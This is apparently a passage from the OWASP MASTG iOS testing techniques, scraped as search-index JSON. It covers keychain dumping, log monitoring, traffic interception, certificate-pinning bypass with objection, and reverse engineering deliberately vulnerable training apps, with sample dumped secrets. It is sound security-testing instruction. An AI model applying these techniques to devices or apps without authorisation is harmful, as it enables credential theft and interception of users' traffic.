(see \"iOS Network Communication\")Please refer to the mentioned chapters to learn more about how to test each of these points.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0058/#app-binary","title":"App Binary","text":"iOS app binaries are fat binaries (they can be deployed on all devices 32- and 64-bit). In contrast to Android, where you can actually decompile the app binary to Java code, the iOS app binaries can only be disassembled.
Refer to the chapter Tampering and Reverse Engineering on iOS for more details.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0058/#native-libraries","title":"Native Libraries","text":"iOS apps can make their codebase modular by using different elements. In the MASTG we will refer to all of them as native libraries, but they can come in different forms:
.dylib
extension) are also used but must be part of a framework bundle. Standalone Dynamic Libraries are not supported on iOS, watchOS, or tvOS, except for the system Swift libraries provided by Xcode.XCFrameworks
): Xcode 11 supports distributing binary libraries using the XCFrameworks
format which is a new way to bundle up multiple variants of a Framework, e.g. for any of the platforms that Xcode supports (including simulator and devices). They can also bundle up static libraries (and their corresponding headers) and support binary distribution of Swift and C-based code. XCFrameworks
can be distributed as Swift Packages.You can view native libraries in Grapefruit by clicking on the Modules icon in the left menu bar:
And get a more detailed view including their imports/exports:
They are available in the Frameworks
folder in the IPA, you can also inspect them from the terminal:
$ ls -1 Frameworks/\nRealm.framework\nlibswiftCore.dylib\nlibswiftCoreData.dylib\nlibswiftCoreFoundation.dylib\n
or from the device with objection (as well as per SSH of course):
OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # ls\nNSFileType Perms NSFileProtection ... Name\n------------ ------- ------------------ ... ----------------------------\nDirectory 493 None ... Realm.framework\nRegular 420 None ... libswiftCore.dylib\nRegular 420 None ... libswiftCoreData.dylib\nRegular 420 None ... libswiftCoreFoundation.dylib\n...\n
Please note that this might not be the complete list of native code elements being used by the app as some can be part of the source code, meaning that they'll be compiled in the app binary and therefore cannot be found as standalone libraries or Frameworks in the Frameworks
folder.
For now this is all information you can get about the Frameworks unless you start reverse engineering them. Refer to the chapter Tampering and Reverse Engineering on iOS for more information about how to reverse engineer Frameworks.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0058/#other-app-resources","title":"Other App Resources","text":"It is normally worth taking a look at the rest of the resources and files that you may find in the Application Bundle (.app) inside the IPA as some times they contain additional goodies like encrypted databases, certificates, etc.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0059/","title":"Accessing App Data Directories","text":"Once you have installed the app, there is further information to explore. Let's go through a short overview of the app folder structure on iOS apps to understand which data is stored where. The following illustration represents the application folder structure:
On iOS, system applications can be found in the /Applications
directory while user-installed apps are available under /private/var/containers/
. However, finding the right folder just by navigating the file system is not a trivial task as every app gets a random 128-bit UUID (Universal Unique Identifier) assigned for its directory names.
In order to easily obtain the installation directory information for user-installed apps you can follow the following methods:
Connect to the terminal on the device and run the command ipainstaller
(IPA Installer Console) as follows:
iPhone:~ root# ipainstaller -l\n...\nOWASP.iGoat-Swift\n\niPhone:~ root# ipainstaller -i OWASP.iGoat-Swift\n...\nBundle: /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67\nApplication: /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app\nData: /private/var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693\n
Using objection's command env
will also show you all the directory information of the app. Connecting to the application with objection is described in the section \"Recommended Tools - Objection\".
OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # env\n\nName Path\n----------------- -------------------------------------------------------------------------------------------\nBundlePath /var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app\nCachesDirectory /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Library/Caches\nDocumentDirectory /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Documents\nLibraryDirectory /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Library\n
As you can see, apps have two main locations:
/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/
)./var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/
).These folders contain information that must be examined closely during application security assessments (for example when analyzing the stored data for sensitive data).
Bundle directory:
Data directory:
NSURLIsExcludedFromBackupKey
.Application Support
and Caches
subdirectories, but the app can create custom subdirectories.NSURLIsExcludedFromBackupKey
.NSUserDefaults
can be found in this file.Let's take a closer look at iGoat-Swift's Application Bundle (.app) directory inside the Bundle directory (/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app
):
OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # ls\nNSFileType Perms NSFileProtection ... Name\n------------ ------- ------------------ ... --------------------------------------\nRegular 420 None ... rutger.html\nRegular 420 None ... mansi.html\nRegular 420 None ... splash.html\nRegular 420 None ... about.html\n\nRegular 420 None ... LICENSE.txt\nRegular 420 None ... Sentinel.txt\nRegular 420 None ... README.txt\n\nDirectory 493 None ... URLSchemeAttackExerciseVC.nib\nDirectory 493 None ... CutAndPasteExerciseVC.nib\nDirectory 493 None ... RandomKeyGenerationExerciseVC.nib\nDirectory 493 None ... KeychainExerciseVC.nib\nDirectory 493 None ... CoreData.momd\nRegular 420 None ... archived-expanded-entitlements.xcent\nDirectory 493 None ... SVProgressHUD.bundle\n\nDirectory 493 None ... Base.lproj\nRegular 420 None ... Assets.car\nRegular 420 None ... PkgInfo\nDirectory 493 None ... _CodeSignature\nRegular 420 None ... AppIcon60x60@3x.png\n\nDirectory 493 None ... Frameworks\n\nRegular 420 None ... embedded.mobileprovision\n\nRegular 420 None ... Credentials.plist\nRegular 420 None ... Assets.plist\nRegular 420 None ... Info.plist\n\nRegular 493 None ... iGoat-Swift\n
You can also visualize the Bundle directory from Grapefruit by clicking on Finder -> Bundle:
Including the Info.plist
file:
As well as the Data directory in Finder -> Home:
Refer to the Testing Data Storage chapter for more information and best practices on securely storing sensitive data.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0060/","title":"Monitoring System Logs","text":"Many apps log informative (and potentially sensitive) messages to the console log. The log also contains crash reports and other useful information. You can collect console logs through the Xcode Devices window as follows:
To save the console output to a text file, go to the top right side of the Console window and click on the Save button.
You can also connect to the device shell as explained in Accessing the Device Shell, install socat via apt-get and run the following command:
iPhone:~ root# socat - UNIX-CONNECT:/var/run/lockdown/syslog.sock\n\n========================\nASL is here to serve you\n> watch\nOK\n\nJun 7 13:42:14 iPhone chmod[9705] <Notice>: MS:Notice: Injecting: (null) [chmod] (1556.00)\nJun 7 13:42:14 iPhone readlink[9706] <Notice>: MS:Notice: Injecting: (null) [readlink] (1556.00)\nJun 7 13:42:14 iPhone rm[9707] <Notice>: MS:Notice: Injecting: (null) [rm] (1556.00)\nJun 7 13:42:14 iPhone touch[9708] <Notice>: MS:Notice: Injecting: (null) [touch] (1556.00)\n...\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0061/","title":"Dumping KeyChain Data","text":"Dumping the KeyChain data can be done with multiple tools, but not all of them will work on any iOS version. As is more often the case, try the different tools or look up their documentation for information on the latest supported versions.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0061/#objection-jailbroken-non-jailbroken","title":"Objection (Jailbroken / non-Jailbroken)","text":"The KeyChain data can easily be viewed using Objection. First, connect objection to the app as described in \"Recommended Tools - Objection\". Then, use the ios keychain dump
command to get an overview of the keychain:
$ objection --gadget=\"iGoat-Swift\" explore\n... [usb] # ios keychain dump\n...\nNote: You may be asked to authenticate using the devices passcode or TouchID\nSave the output by adding `--json keychain.json` to this command\nDumping the iOS keychain...\nCreated Accessible ACL Type Account Service Data\n------------------------- ------------------------------ ----- -------- ------------------- -------------------------- ----------------------------------------------------------------------\n2019-06-06 10:53:09 +0000 WhenUnlocked None Password keychainValue com.highaltitudehacks.dvia mypassword123\n2019-06-06 10:53:30 +0000 WhenUnlockedThisDeviceOnly None Password SCAPILazyVector com.toyopagroup.picaboo (failed to decode)\n2019-06-06 10:53:30 +0000 AfterFirstUnlockThisDeviceOnly None Password fideliusDeviceGraph com.toyopagroup.picaboo (failed to decode)\n2019-06-06 10:53:30 +0000 AfterFirstUnlockThisDeviceOnly None Password SCDeviceTokenKey2 com.toyopagroup.picaboo 00001:FKsDMgVISiavdm70v9Fhv5z+pZfBTTN7xkwSwNvVr2IhVBqLsC7QBhsEjKMxrEjh\n2019-06-06 10:53:30 +0000 AfterFirstUnlockThisDeviceOnly None Password SCDeviceTokenValue2 com.toyopagroup.picaboo CJ8Y8K2oE3rhOFUhnxJxDS1Zp8Z25XzgY2EtFyMbW3U=\nOWASP.iGoat-Swift on (iPhone: 12.0) [usb] # quit \n
Note that currently, the latest versions of frida-server and objection do not correctly decode all keychain data. Different combinations can be tried to increase compatibility. For example, the previous printout was created with frida-tools==1.3.0
, frida==12.4.8
and objection==1.5.0
.
Finally, since the keychain dumper is executed from within the application context, it will only print out keychain items that can be accessed by the application and not the entire keychain of the iOS device.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0061/#grapefruit-jailbroken-non-jailbroken","title":"Grapefruit (Jailbroken / non-Jailbroken)","text":"With Grapefruit it's possible to access the keychain data of the app you have selected. Inside the Storage section, click on Keychain and you can see a listing of the stored Keychain information.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0061/#keychain-dumper-jailbroken","title":"Keychain-dumper (Jailbroken)","text":"You can use Keychain-dumper dump the jailbroken device's KeyChain contents. Once you have it running on your device:
iPhone:~ root# /tmp/keychain_dumper\n\n(...)\n\nGeneric Password\n----------------\nService: myApp\nAccount: key3\nEntitlement Group: RUD9L355Y.sg.vantagepoint.example\nLabel: (null)\nGeneric Field: (null)\nKeychain Data: SmJSWxEs\n\nGeneric Password\n----------------\nService: myApp\nAccount: key7\nEntitlement Group: RUD9L355Y.sg.vantagepoint.example\nLabel: (null)\nGeneric Field: (null)\nKeychain Data: WOg1DfuH\n
In newer versions of iOS (iOS 11 and up), additional steps are necessary. See the README.md for more details. Note that this binary is signed with a self-signed certificate that has a \"wildcard\" entitlement. The entitlement grants access to all items in the Keychain. If you are paranoid or have very sensitive private data on your test device, you may want to build the tool from source and manually sign the appropriate entitlements into your build; instructions for doing this are available in the GitHub repository.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0062/","title":"Basic Network Monitoring/Sniffing","text":"You can remotely sniff all traffic in real-time on iOS by creating a Remote Virtual Interface for your iOS device. First make sure you have Wireshark installed on your macOS host computer.
$ rvictl -s <UDID>\nStarting device <UDID> [SUCCEEDED] with interface rvi0\n
ip.addr == 192.168.1.1 && http\n
The documentation of Wireshark offers many examples for Capture Filters that should help you to filter the traffic to get the information you want.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0063/","title":"Setting up an Interception Proxy","text":"Burp Suite is an integrated platform for security testing mobile and web applications. Its tools work together seamlessly to support the entire testing process, from initial mapping and analysis of attack surfaces to finding and exploiting security vulnerabilities. Burp Proxy operates as a web proxy server for Burp Suite, which is positioned as a man-in-the-middle between the browser and web server(s). Burp Suite allows you to intercept, inspect, and modify incoming and outgoing raw HTTP traffic.
Setting up Burp to proxy your traffic is pretty straightforward. We assume that both your iOS device and host computer are connected to a Wi-Fi network that permits client-to-client traffic. If client-to-client traffic is not permitted, you can use usbmuxd to connect to Burp via USB.
PortSwigger provides a good tutorial on setting up an iOS device to work with Burp and a tutorial on installing Burp's CA certificate to an iOS device.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0063/#using-burp-via-usb-on-a-jailbroken-device","title":"Using Burp via USB on a Jailbroken Device","text":"In the section Accessing the Device Shell we've already learned how we can use iproxy to use SSH via USB. When doing dynamic analysis, it's interesting to use the SSH connection to route our traffic to Burp that is running on our computer. Let's get started:
First we need to use iproxy to make SSH from iOS available on localhost.
$ iproxy 2222 22\nwaiting for connection\n
The next step is to make a remote port forwarding of port 8080 on the iOS device to the localhost interface on our computer to port 8080.
ssh -R 8080:localhost:8080 root@localhost -p 2222\n
You should now be able to reach Burp on your iOS device. Open Safari on iOS and go to 127.0.0.1:8080 and you should see the Burp Suite Page. This would also be a good time to install the CA certificate of Burp on your iOS device.
The last step would be to set the proxy globally on your iOS device:
Open Safari and go to any webpage, you should see now the traffic in Burp. Thanks @hweisheimer for the initial idea!
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0064/","title":"Bypassing Certificate Pinning","text":"Some applications will implement SSL Pinning, which prevents the application from accepting your intercepting certificate as a valid certificate. This means that you will not be able to monitor the traffic between the application and the server.
For most applications, certificate pinning can be bypassed within seconds, but only if the app uses the API functions that are covered by these tools. If the app is implementing SSL Pinning with a custom framework or library, the SSL Pinning must be manually patched and deactivated, which can be time-consuming.
This section describes various ways to bypass SSL Pinning and gives guidance about what you should do when the existing tools don't work.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0064/#methods-for-jailbroken-and-non-jailbroken-devices","title":"Methods for Jailbroken and Non-jailbroken Devices","text":"If you have a jailbroken device with frida-server installed, you can bypass SSL pinning by running the following Objection command (repackage your app if you're using a non-jailbroken device):
ios sslpinning disable\n
Here's an example of the output:
See also Objection's help on Disabling SSL Pinning for iOS for further information and inspect the pinning.ts file to understand how the bypass works.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0064/#methods-for-jailbroken-devices-only","title":"Methods for Jailbroken Devices Only","text":"If you have a jailbroken device you can try one of the following tools that can automatically disable SSL Pinning:
Technologies and systems change over time, and some bypass techniques might not work eventually. Hence, it's part of the tester work to do some research, since not every tool is able to keep up with OS versions quickly enough.
Some apps might implement custom SSL pinning methods, so the tester could also develop new bypass scripts making use of existing ones as a base or inspiration and using similar techniques but targeting the app's custom APIs. Here you can inspect three good examples of such scripts:
Other Techniques:
If you don't have access to the source, you can try binary patching:
NSURLSession
, CFStream
, and AFNetworking
and methods/strings containing words like \"pinning\", \"X.509\", \"Certificate\", etc.iOS reverse engineering is a mixed bag. On one hand, apps programmed in Objective-C and Swift can be disassembled nicely. In Objective-C, object methods are called via dynamic function pointers called \"selectors\", which are resolved by name during runtime. The advantage of runtime name resolution is that these names need to stay intact in the final binary, making the disassembly more readable. Unfortunately, this also means that no direct cross-references between methods are available in the disassembler and constructing a flow graph is challenging.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0065/#references","title":"References","text":"The preferred method of statically analyzing iOS apps involves using the original Xcode project files. Ideally, you will be able to compile and debug the app to quickly identify any potential issues with the source code.
Black box analysis of iOS apps without access to the original source code requires reverse engineering. For example, no decompilers are available for iOS apps (although most commercial and open-source disassemblers can provide a pseudo-source code view of the binary), so a deep inspection requires you to read assembly code.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0067/","title":"Dynamic Analysis on iOS","text":"Life is easy with a jailbroken device: not only do you gain easy privileged access to the device, the lack of code signing allows you to use more powerful dynamic analysis techniques. On iOS, most dynamic analysis tools are based on Cydia Substrate, a framework for developing runtime patches, or Frida, a dynamic introspection tool. For basic API monitoring, you can get away with not knowing all the details of how Substrate or Frida work - you can simply use existing API monitoring tools.
On iOS, collecting basic information about a running process or an application can be slightly more challenging than compared to Android. On Android (or any Linux-based OS), process information is exposed as readable text files via procfs. Thus, any information about a target process can be obtained on a rooted device by parsing these text files. In contrast, on iOS there is no procfs equivalent present. Also, on iOS many standard UNIX command line tools for exploring process information, for instance lsof and vmmap, are removed to reduce the firmware size.
In this section, we will learn how to collect process information on iOS using command line tools like lsof. Since many of these tools are not present on iOS by default, we need to install them via alternative methods. For instance, lsof can be installed using Cydia (the executable is not the latest version available, but nevertheless addresses our purpose).
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0068/","title":"Disassembling Native Code","text":"Because Objective-C and Swift are fundamentally different, the programming language in which the app is written affects the possibilities for reverse engineering it. For example, Objective-C allows method invocations to be changed at runtime. This makes hooking into other app functions (a technique heavily used by Cycript and other reverse engineering tools) easy. This \"method swizzling\" is not implemented the same way in Swift, and the difference makes the technique harder to execute with Swift than with Objective-C.
On iOS, all the application code (both Swift and Objective-C) is compiled to machine code (e.g. ARM). Thus, to analyze iOS applications a disassembler is needed.
If you want to disassemble an application from the App Store, remove the Fairplay DRM first. Section \"Acquiring the App Binary\" in the chapter \"iOS Basic Security Testing\" explains how.
In this section the term \"app binary\" refers to the Macho-O file in the application bundle which contains the compiled code, and should not be confused with the application bundle - the IPA file. See section \"Exploring the App Package\" in chapter \"Basic iOS Security Testing\" for more details on the composition of IPA files.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0068/#disassembling-with-ida-pro","title":"Disassembling With IDA Pro","text":"If you have a license for IDA Pro, you can analyze the app binary using IDA Pro as well.
The free version of IDA unfortunately does not support the ARM processor type.
To get started, simply open the app binary in IDA Pro.
Upon opening the file, IDA Pro will perform auto-analysis, which can take a while depending on the size of the binary. Once the auto-analysis is completed you can browse the disassembly in the IDA View (Disassembly) window and explore functions in the Functions window, both shown in the screenshot below.
A regular IDA Pro license does not include a decompiler by default and requires an additional license for the Hex-Rays decompiler, which is expensive. In contrast, Ghidra comes with a very capable free builtin decompiler, making it a compelling alternative to use for reverse engineering.
If you have a regular IDA Pro license and do not want to buy the Hex-Rays decompiler, you can use Ghidra's decompiler by installing the GhIDA plugin for IDA Pro.
The majority of this chapter applies to applications written in Objective-C or having bridged types, which are types compatible with both Swift and Objective-C. The Swift compatibility of most tools that work well with Objective-C is being improved.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0069/","title":"Decompiling Native Code","text":"TODO. Hopper is only mentioned once in the entire document, ghidra is only used for disassembly, ... We can expand this, maybe add some good ghidra snippets for objective-c mapping, ...
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0070/","title":"Extracting Information from the Application Binary","text":"You can use radare to get information about the binary, such as the architecture, the list of shared libraries, the list of classes and methods, strings and more.
Let's use the Damn Vulnerable iOS App DVIA v1 as an example. Open its main binary with radare2:
r2 DamnVulnerableIOSApp\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0070/#binary-information","title":"Binary Information","text":"To get information about the binary, you can use the i
command. This command will list information about the binary, such as the architecture, the list of shared libraries, the list of classes and methods, strings and more.
[0x1000180c8]> i\n...\nsize 0x43d5f0\nhumansz 4.2M\nmode r-x\nformat mach064\niorw false\nblock 0x100\npacket xtr.fatmach0\n...\nlang objc with blocks\nlinenum false\nlsyms false\nnx false\nos ios\npic true\nrelocs true\nsanitize false\nstatic false\nstripped true\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0070/#classes-and-methods","title":"Classes and Methods","text":"And then we can proceed to extract information about the methods in the application's source code. To do this, we need to load the application binary into radare and then list the classes and methods in the binary.
[0x1000180c8]> icc\n\n...\n\n@interface SFAntiPiracy : NSObject\n{\n}\n+ (int) isPirated\n+ (int) isJailbroken\n+ (void) killApplication\n+ (bool) isTheDeviceJailbroken\n+ (bool) isTheApplicationCracked\n+ (bool) isTheApplicationTamperedWith\n+ (int) urlCheck\n...\n@end\n
Note the plus sign, which means that this is a class method that returns a BOOL type. A minus sign would mean that this is an instance method. Refer to later sections to understand the practical difference between these.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0070/#linked-libraries","title":"Linked Libraries","text":"The following command is listing shared libraries:
[0x1000180c8]> il\n[Linked libraries]\n/System/Library/Frameworks/SystemConfiguration.framework/SystemConfiguration\n/System/Library/Frameworks/StoreKit.framework/StoreKit\n/System/Library/Frameworks/Security.framework/Security\n/System/Library/Frameworks/QuartzCore.framework/QuartzCore\n/System/Library/Frameworks/MobileCoreServices.framework/MobileCoreServices\n/usr/lib/libz.1.dylib\n/System/Library/Frameworks/CoreLocation.framework/CoreLocation\n/System/Library/Frameworks/CoreGraphics.framework/CoreGraphics\n/System/Library/Frameworks/CFNetwork.framework/CFNetwork\n/System/Library/Frameworks/AudioToolbox.framework/AudioToolbox\n/System/Library/Frameworks/CoreData.framework/CoreData\n/System/Library/Frameworks/UIKit.framework/UIKit\n/System/Library/Frameworks/Foundation.framework/Foundation\n/usr/lib/libobjc.A.dylib\n/usr/lib/libSystem.B.dylib\n/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation\n\n16 libraries\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0070/#strings","title":"Strings","text":"Obtaining strings is very useful when reverse engineering an app because it can give you a lot of information about the app's functionality. For example, you can find URLs, API endpoints, encryption keys, and more. You can also find strings that will point you to interesting functions, such as the login function or a function that checks whether the device is jailbroken.
[0x1000180c8]> izz~cstring | less\n\n\n29903 0x001d0b4c 0x1001d0b4c 5 6 5.__TEXT.__cstring ascii Admin\n29904 0x001d0b52 0x1001d0b52 13 14 5.__TEXT.__cstring ascii This!sA5Ecret\n29905 0x001d0b60 0x1001d0b60 15 16 5.__TEXT.__cstring ascii pushSuccessPage\n29906 0x001d0b70 0x1001d0b70 4 5 5.__TEXT.__cstring ascii Oops\n29907 0x001d0b75 0x1001d0b75 30 31 5.__TEXT.__cstring ascii Incorrect Username or Password\n29908 0x001d0b94 0x1001d0b94 17 18 5.__TEXT.__cstring ascii usernameTextField\n29909 0x001d0ba6 0x1001d0ba6 39 40 5.__TEXT.__cstring ascii T@\"UITextField\",&,N,V_usernameTextField\n29910 0x001d0bce 0x1001d0bce 17 18 5.__TEXT.__cstring ascii passwordTextField\n...\n29915 0x001d0ca8 0x1001d0ca8 18 19 5.__TEXT.__cstring ascii http://google.com/\n29926 0x001d0d73 0x1001d0d73 37 38 5.__TEXT.__cstring ascii Request Sent using pinning, lookout !\n29927 0x001d0d99 0x1001d0d99 77 78 5.__TEXT.__cstring ascii Certificate validation failed. \n You will have to do better than this, my boy!!\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0071/","title":"Retrieving Strings","text":"Strings are always a good starting point while analyzing a binary, as they provide context to the associated code. For instance, an error log string such as \"Cryptogram generation failed\" gives us a hint that the adjoining code might be responsible for the generation of a cryptogram.
In order to extract strings from an iOS binary, you can use GUI tools such as Ghidra or iaito or rely on CLI-based tools such as the strings Unix utility (strings <path_to_binary>
) or radare2's rabin2 (rabin2 -zz <path_to_binary>
). When using the CLI-based ones you can take advantage of other tools such as grep (e.g. in conjunction with regular expressions) to further filter and analyze the results.
Ghidra can be used for analyzing the iOS binaries and obtaining cross references by right clicking the desired function and selecting Show References to.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0073/","title":"Information Gathering - API Usage","text":"The iOS platform provides many built-in libraries for frequently used functionalities in applications, for example cryptography, Bluetooth, NFC, network and location libraries. Determining the presence of these libraries in an application can give us valuable information about its underlying working.
For instance, if an application is importing the CC_SHA256
function, it indicates that the application will be performing some kind of hashing operation using the SHA256 algorithm. Further information on how to analyze iOS's cryptographic APIs is discussed in the section \"iOS Cryptographic APIs\".
Similarly, the above approach can be used to determine where and how an application is using Bluetooth. For instance, an application performing communication using the Bluetooth channel must use functions from the Core Bluetooth framework such as CBCentralManager
or connect
. Using the iOS Bluetooth documentation you can determine the critical functions and start analysis around those function imports.
Most of the apps you might encounter connect to remote endpoints. Even before you perform any dynamic analysis (e.g. traffic capture and analysis), you can obtain some initial inputs or entry points by enumerating the domains to which the application is supposed to communicate to.
Typically these domains will be present as strings within the binary of the application. One can extract domains by retrieving strings (as discussed above) or checking the strings using tools like Ghidra. The latter option has a clear advantage: it can provide you with context, as you'll be able to see in which context each domain is being used by checking the cross-references.
From here on you can use this information to derive more insights which might be of use later during your analysis, e.g. you could match the domains to the pinned certificates or perform further reconnaissance on domain names to know more about the target environment.
The implementation and verification of secure connections can be an intricate process and there are numerous aspects to consider. For instance, many applications use other protocols apart from HTTP such as XMPP or plain TCP packets, or perform certificate pinning in an attempt to deter MITM attacks.
Remember that in most cases, using only static analysis will not be enough and might even turn out to be extremely inefficient when compared to the dynamic alternatives which will get much more reliable results (e.g. using an interception proxy). In this section we've only touched the surface, so please refer to the section \"Basic Network Monitoring/Sniffing\" in the \"iOS Basic Security Testing\" chapter and check out the test cases in the chapter \"iOS Network Communication\" for further information.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0076/","title":"Reviewing Disassembled Objective-C and Swift Code","text":"In this section we will be exploring iOS application's binary code manually and perform static analysis on it. Manual analysis can be a slow process and requires immense patience. A good manual analysis can make the dynamic analysis more successful.
There are no hard written rules for performing static analysis, but there are few rules of thumb which can be used to have a systematic approach to manual analysis:
Techniques discussed in this section are generic and applicable irrespective of the tools used for analysis.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0076/#objective-c","title":"Objective-C","text":"In addition to the techniques learned in the \"Disassembling and Decompiling\" section, for this section you'll need some understanding of the Objective-C runtime. For instance, functions like _objc_msgSend
or _objc_release
are specially meaningful for the Objective-C runtime.
We will be using the UnCrackable App for iOS Level 1, which has the simple goal of finding a secret string hidden somewhere in the binary. The application has a single home screen and a user can interact via inputting custom strings in the provided text field.
When the user inputs the wrong string, the application shows a pop-up with the \"Verification Failed\" message.
You can keep note of the strings displayed in the pop-up, as this might be helpful when searching for the code where the input is processed and a decision is being made. Luckily, the complexity and interaction with this application is straightforward, which bodes well for our reversing endeavors.
For static analysis in this section, we will be using Ghidra 9.0.4. Ghidra 9.1_beta auto-analysis has a bug and does not show the Objective-C classes.
We can start by checking the strings present in the binary by opening it in Ghidra. The listed strings might be overwhelming at first, but with some experience in reversing Objective-C code, you'll learn how to filter and discard the strings that are not really helpful or relevant. For instance, the ones shown in screenshot below, which are generated for the Objective-C runtime. Other strings might be helpful in some cases, such as those containing symbols (function names, class names, etc.) and we'll be using them when performing static analysis to check if some specific function is being used.
If we continue our careful analysis, we can spot the string, \"Verification Failed\", which is used for the pop-up when a wrong input is given. If you follow the cross-references (Xrefs) of this string, you will reach buttonClick
function of the ViewController
class. We will look into the buttonClick
function later in this section. When further checking the other strings in the application, only a few of them look a likely candidate for a hidden flag. You can try them and verify as well.
Moving forward, we have two paths to take. Either we can start analyzing the buttonClick
function identified in the above step, or start analyzing the application from the various entry points. In real world situation, most times you will be taking the first path, but from a learning perspective, in this section we will take the latter path.
An iOS application calls different predefined functions provided by the iOS runtime depending on its the state within the application life cycle. These functions are known as the entry points of the app. For example:
[AppDelegate application:didFinishLaunchingWithOptions:]
is called when the application is started for the first time.[AppDelegate applicationDidBecomeActive:]
is called when the application is moving from inactive to active state.Many applications execute critical code in these sections and therefore they're normally a good starting point in order to follow the code systematically.
Once we're done with the analysis of all the functions in the AppDelegate
class, we can conclude that there is no relevant code present. The lack of any code in the above functions raises the question - from where is the application's initialization code being called?
Luckily the current application has a small code base, and we can find another ViewController
class in the Symbol Tree view. In this class, function viewDidLoad
function looks interesting. If you check the documentation of viewDidLoad
, you can see that it can also be used to perform additional initialization on views.
If we check the decompilation of this function, there are a few interesting things going on. For instance, there is a call to a native function at line 31 and a label is initialized with a setHidden
flag set to 1 in lines 27-29. You can keep a note of these observations and continue exploring the other functions in this class. For brevity, exploring the other parts of the function is left as an exercise for the readers.
In our first step, we observed that the application verifies the input string only when the UI button is pressed. Thus, analyzing the buttonClick
function is an obvious target. As earlier mentioned, this function also contains the string we see in the pop-ups. At line 29 a decision is being made, which is based on the result of isEqualString
(output saved in uVar1
at line 23). The input for the comparison is coming from the text input field (from the user) and the value of the label
. Therefore, we can assume that the hidden flag is stored in that label.
Now we have followed the complete flow and have all the information about the application flow. We also concluded that the hidden flag is present in a text label and in order to determine the value of the label, we need to revisit viewDidLoad
function, and understand what is happening in the native function identified. Analysis of the native function is discussed in \"Reviewing Disassembled Native Code\".
Analyzing disassembled native code requires a good understanding of the calling conventions and instructions used by the underlying platform. In this section we are looking in ARM64 disassembly of the native code. A good starting point to learn about ARM architecture is available at Introduction to ARM Assembly Basics by Azeria Labs Tutorials. This is a quick summary of the things that we will be using in this section:
As mentioned above as well, Objective-C code is also compiled to native binary code, but analyzing C/C++ native can be more challenging. In case of Objective-C there are various symbols (especially function names) present, which eases the understanding of the code. In the above section we've learned that the presence of function names like setText
, isEqualStrings
can help us in quickly understanding the semantics of the code. In case of C/C++ native code, if all the binaries are stripped, there can be very few or no symbols present to assist us into analyzing it.
Decompilers can help us in analyzing native code, but they should be used with caution. Modern decompilers are very sophisticated and among many techniques used by them to decompile code, a few of them are heuristics based. Heuristics based techniques might not always give correct results, one such case being, determining the number of input parameters for a given native function. Having knowledge of analyzing disassembled code, assisted with decompilers can make analyzing native code less error prone.
We will be analyzing the native function identified in viewDidLoad
function in the previous section. The function is located at offset 0x1000080d4. The return value of this function used in the setText
function call for the label. This text is used to compare against the user input. Thus, we can be sure that this function will be returning a string or equivalent.
The first thing we can see in the disassembly of the function is that there is no input to the function. The registers X0-X7 are not read throughout the function. Also, there are multiple calls to other functions like the ones at 0x100008158, 0x10000dbf0 etc.
The instructions corresponding to one such function calls can be seen below. The branch instruction bl
is used to call the function at 0x100008158.
1000080f0 1a 00 00 94 bl FUN_100008158\n1000080f4 60 02 00 39 strb w0,[x19]=>DAT_10000dbf0\n
The return value from the function (found in W0), is stored to the address in register X19 (strb
stores a byte to the address in register). We can see the same pattern for other function calls, the returned value is stored in X19 register and each time the offset is one more than the previous function call. This behavior can be associated with populating each index of a string array at a time. Each return value is been written to an index of this string array. There are 11 such calls, and from the current evidence we can make an intelligent guess that length of the hidden flag is 11. Towards the end of the disassembly, the function returns with the address to this string array.
100008148 e0 03 13 aa mov x0=>DAT_10000dbf0,x19\n
To determine the value of the hidden flag we need to know the return value of each of the subsequent function calls identified above. When analyzing the function 0x100006fb4, we can observe that this function is much bigger and more complex than the previous one we analyzed. Function graphs can be very helpful when analyzing complex functions, as it helps into better understanding the control flow of the function. Function graphs can be obtained in Ghidra by clicking the Display function graph icon in the sub-menu.
